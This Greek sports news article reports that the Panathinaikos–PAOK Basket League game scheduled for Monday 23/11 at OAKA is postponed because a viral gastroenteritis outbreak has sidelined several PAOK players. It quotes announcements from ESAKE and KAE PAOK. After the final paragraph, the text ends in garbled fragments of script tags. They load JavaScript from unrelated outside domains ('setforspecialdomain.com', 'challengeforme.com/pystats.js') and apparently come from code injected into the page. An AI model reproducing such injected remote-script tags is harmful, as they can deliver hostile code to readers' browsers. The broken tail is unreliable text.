Μπάσκετ: Αναβάλλεται το Παναθηναϊκός – ΠΑΟΚ

http://content-mcdn.sentragoal.gr/filesystem/images/20151111/low/pegasus_LARGE_t_1301_106742084.JPG

Μια ίωση, μορφής γαστρεντερίτιδας, έβγαλε νοκ άουτ επτά παίκτες του ΠΑΟΚ (Δέδας, Τσόχλας, Σχορτσανίτης, Βασιλειάδης, Τέπιτς, Ντούβνιακ, Μάρκοβιτς) και ο «δικέφαλος» ζήτησε από τον ΕΣΑΚΕ την αναβολή του δευτεριάτικου ντέρμπι με τον Παναθηναϊκό, με το αίτημα του να γίνεται δεκτό.

Η διοργανώτρια αρχή ανακοίνωσε λοιπόν πως για λόγους ανωτέρας βίας δεν θα διεξαχθεί ο αγώνας την Δευτέρα: «Μετά από εισήγηση του προέδρου του ΕΣΑΚΕ κ. Γιώργου Χαλβατζάκη, η Επιτροπή Πρωταθλήματος αποφάσισε ομόφωνα την αναβολή της προγραμματισμένης για την προσεχή Δευτέρα 23/11 στο ΟΑΚΑ συνάντησης Παναθηναϊκού – ΠΑΟΚ για την 7η αγωνιστική της Basket League ΣΚΡΑΤΣ, για λόγους ανωτέρας βίας. Η νέα ημερομηνία διεξαγωγής του αγώνα θα ανακοινωθεί εντός των ημερών».

Η ανακοίνωση της ΚΑΕ ΠΑΟΚ

Από την μεριά της η ΚΑΕ ΠΑΟΚ αναφέρει: «Τα πολλά και σοβαρα προβλήματα υγείας που παρουσιάστηκαν σε όλη την ομάδα του ΠΑΟΚ, είχανως αποτέλεσμα την αναβολή του αγώνα Παναθηναϊκός – ΠΑΟΚ, ύστερα από απόφαση της Επιτροπής Πρωταθλήματος του ΕΣΑΚΕ.

Με την αδυναμία οκτών παικτών της ομάδας να προπονηθούν και τα συμπτώματα ίωσης και γαστρεντερίτιδας να έχουν καταβάλει δέκα συνολικά μέλη της ομάδας, ο ΠΑΟΚ κατέθεσε επίσημο αίτημα αναβολής του αγώνα στον ΕΣΑΚΕ, που πήρε την απόφαση και την γνωστοποίησε με την εξής ανακοίνωση. “Μετά από εισήγηση του προέδρου του ΕΣΑΚΕ κ. Γιώργου Χαλβατζάκη, η Επιτροπή Πρωταθλήματος αποφάσισε ομόφωνα την αναβολή της προγραμματισμένης για την προσεχή Δευτέρα 23/11 στο ΟΑΚΑ συνάντησης Παναθηναϊκού – ΠΑΟΚ για την 7η αγωνιστική της Basket League ΣΚΡΑΤΣ, για λόγους ανωτέρας βίας. Η νέα ημερομηνία διεξαγωγής του αγώνα θα ανακοινωθεί εντός των ημερών”.

Αναπόφευκτα και το σημερινό πρόγραμμα της ομάδας, τροποποιήθηκε σε ατομικό πρόγραμμα προπόνησης για τους ελάχιστους διαθέσιμους παίκτες, όσους γλίτωσαν δηλαδή από τα προβλήματα που έπληξαν την ομάδα τις τελευταίες ημέρες».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >